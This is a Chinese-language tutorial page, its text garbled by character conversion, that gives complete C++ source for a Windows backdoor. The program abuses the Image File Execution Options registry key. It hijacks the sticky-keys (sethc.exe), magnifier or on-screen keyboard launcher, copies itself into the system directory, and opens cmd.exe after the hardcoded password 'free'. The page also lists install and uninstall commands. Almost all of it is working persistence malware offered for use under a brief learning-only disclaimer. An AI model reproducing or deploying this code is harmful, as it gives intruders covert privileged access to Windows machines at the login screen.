C++映像劫持後門實例剖析。本站提示廣大學習愛好者:(C++映像劫持後門實例剖析)文章只能為提供參考,不一定能成為您想要的結果。以下是C++映像劫持後門實例剖析正文
本文實例講述了C++映像劫持後門的辦法。分享給年夜家供年夜家參考。詳細以下:
// freeheart.cpp : Defines the entry point for the console application.
//進修交換應用,守法應用效果自信。
// by:cnblogs.com/blogg time 2013.5.24
// argv 0 = freeheart.exe
// argv 1 = -i
// argv 2 = name.exe
// argv 3 = 1 2 3
// 此法式應用的映像劫持技巧,
// 在注冊表傍邊樹立一個法式名的項目,在外面應用debugger,然後在外面指向本身的法式。
//[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
//
#include "stdafx.h"
#include "windows.h"
#include "atlbase.h"
#include <iostream>
using namespace std;
int main(int argc, char* argv[])
{
void anzhuang(char *Path,char *filename);
void xiezai(char *path,char *hName);
void CopyZiji(char *CopyPath);
char *password = "free"; //真暗碼緩沖區
char *shuruPwd = ""; //輸出的暗碼緩沖區
int errorbuff = 0;
char *PathBuff = "";
char *FileName = "";
char *chsname = "sethc.exe"; //SHIFT粘貼鍵法式的稱號
char *fangdajing = "magnify.exe"; //
char *pingmujianpan = "osk.exe"; //
LPTSTR sysbuff; //獲得體系途徑的緩沖區
TCHAR tchBuffer2[1024]; //請求一個字符變量數組
sysbuff = tchBuffer2; //把體系的途徑放到這個變量數組裡
if(GetSystemDirectory(sysbuff, MAX_PATH)) //獲得體系途徑
{
sysbuff = strcat(sysbuff,"\\"); //strcat 剪切在一路,把\\放在體系途徑的前面,然後放入體系緩沖區傍邊。
}
if (argv[1] != NULL)
{
//裝置敕令斷定
if (strcmp(argv[1],"-i") == 0)
{
if (argv[2] != NULL)
{
FileName=argv[2];
}
else
{
cout<<"請輸出文件名!";
return 0;
}
if(argv[3] != NULL)
{
if(strcmp(argv[3],"1") == 0)
{
anzhuang(FileName,chsname);
PathBuff = strcat(sysbuff,FileName);
CopyZiji(PathBuff);
cout<<"創立完成! : "<<PathBuff<<endl;
return 0;
}
if(strcmp(argv[3],"2") == 0)
{
anzhuang(FileName,fangdajing);
PathBuff = strcat(sysbuff,FileName);
CopyZiji(PathBuff); //挪用函數
cout<<"創立完成! : "<<PathBuff<<endl;
return 0;
}
if(strcmp(argv[3],"3") == 0)
{
anzhuang(FileName,pingmujianpan);
PathBuff = strcat(sysbuff,FileName);
CopyZiji(PathBuff); //挪用函數
cout<<"創立完成! : "<<PathBuff<<endl;
return 0;
}
}
else
{
cout<<"請輸出參數!"<<endl;
}
return 0;
}
//卸載
if (strcmp(argv[1],"-u") == 0)
{
if(argv[2] != NULL)
{
if(strcmp(argv[2],"1") == 0)
{
xiezai(sysbuff,chsname);
cout<<"刪除文件勝利!"<<endl;
return 0;
}
if(strcmp(argv[2],"2") == 0)
{
xiezai(sysbuff,fangdajing);
cout<<"刪除文件勝利!"<<endl;
return 0;
}
if(strcmp(argv[2],"3") == 0)
{
xiezai(sysbuff,pingmujianpan);
cout<<"刪除文件勝利!"<<endl;
return 0;
}
}
else
{
cout<<"請輸出參數!"<<endl;
}
return 0;
}
//為何會進入這裡 由於debugger a.exe 實際上是兩個參數,由於if (argv[1] != NULL) 也就是第二個參數不等於空的話履行上面的語句。
while(errorbuff<3) //輪回三次,毛病。
{
cout<<"password:";
cin>>shuruPwd;
if (strcmp(shuruPwd,password) == 0)
{
system("cmd.exe");
break;
}
else
{
cout<<"暗碼毛病!"<<endl;
}
errorbuff++; //自加一次
}
return 0;
}
system("color a");
cout<<"-----------------------------------------------------"<<endl;
cout<<"迎接惠臨自在的心,祝您好運!"<<endl;
cout<<"1: sethc.exe Shift後門\n";
cout<<"2: magnify.exe 縮小鏡後門\n";
cout<<"3: osk.exe 屏幕鍵盤後門\n";
cout<<"-----------------------------------------------------"<<endl;
cout<<"裝置: freeheart.exe -i xx.exe 1"<<endl;
cout<<"卸載: freeheart.exe -u 1"<<endl;
cout<<"銜接暗碼:free"<<endl;
cout<<"-----------------------------------------------------"<<endl;
return 0;
}
//裝置函數
void anzhuang(char *Path,char *filename)
{
HKEY hSoftKey = NULL;
HKEY hCompanyKey = NULL;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"), 0, KEY_WRITE|KEY_READ,&hSoftKey) == ERROR_SUCCESS)
{
if (RegCreateKeyEx(hSoftKey, _T(filename), 0, REG_NONE,REG_OPTION_NON_VOLATILE, KEY_WRITE|KEY_READ, NULL,&hCompanyKey,NULL) == ERROR_SUCCESS)
{
LPBYTE Value=(LPBYTE)Path;
long ret1=::RegSetValueEx(hCompanyKey,"Debugger",0,REG_SZ,(BYTE*)Value,50);
RegCloseKey(hCompanyKey);
}
RegCloseKey(hSoftKey);
}
}
//卸載函數
void xiezai(char *path,char *hName) //hName 傳遞出去的法式名
{
HKEY hSoftKey = NULL;
LPCTSTR hMainKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options";
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, hMainKey, 0, KEY_WRITE|KEY_READ,&hSoftKey) == ERROR_SUCCESS)
{
DWORD len = 256;
DWORD type = REG_SZ;
LPBYTE last = new BYTE[256];
LPCTSTR hname = (LPCTSTR)hName;
char *HHname;
HKEY hKey; //在注冊表傍邊創立一個magnify名的項,在外面傍邊參加debugger,外面跟上本身的法式名的值。
char* DelCom;
HHname=strcat((char *)hMainKey,"\\"); //hmainkey 注冊表的途徑
HHname=strcat((char *)hMainKey,(char *)hname); //hname 法式名
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,(LPCTSTR)HHname,0,KEY_READ,&hKey)==ERROR_SUCCESS && RegQueryValueEx(hKey,"Debugger",0,&type,last,&len)==ERROR_SUCCESS)
{
DelCom=strcat(path,reinterpret_cast <char*>(last));
DeleteFile(DelCom); //刪除文件
RegDeleteKey(hSoftKey,hname); //刪除注冊表
}
RegCloseKey(hSoftKey); //封閉句柄
RegCloseKey(hKey); //封閉句柄
}
}
void CopyZiji(char *CopyPath) //將本身生成exe文件復制到指定的途徑下
{
char PathBuff[MAX_PATH]; //請求一個字符變量數組,年夜小是體系最年夜的長度。
GetModuleFileName(NULL,PathBuff,MAX_PATH); //第一個參數為NULL,就表現獲得以後法式的途徑,第二個參數就是寄存到緩沖區。
CopyFile(PathBuff,CopyPath,true); //CurrentPath 是本身exe,把本身復制到目的途徑傍邊
}
願望本文所述對年夜家的C++法式設計有所贊助。
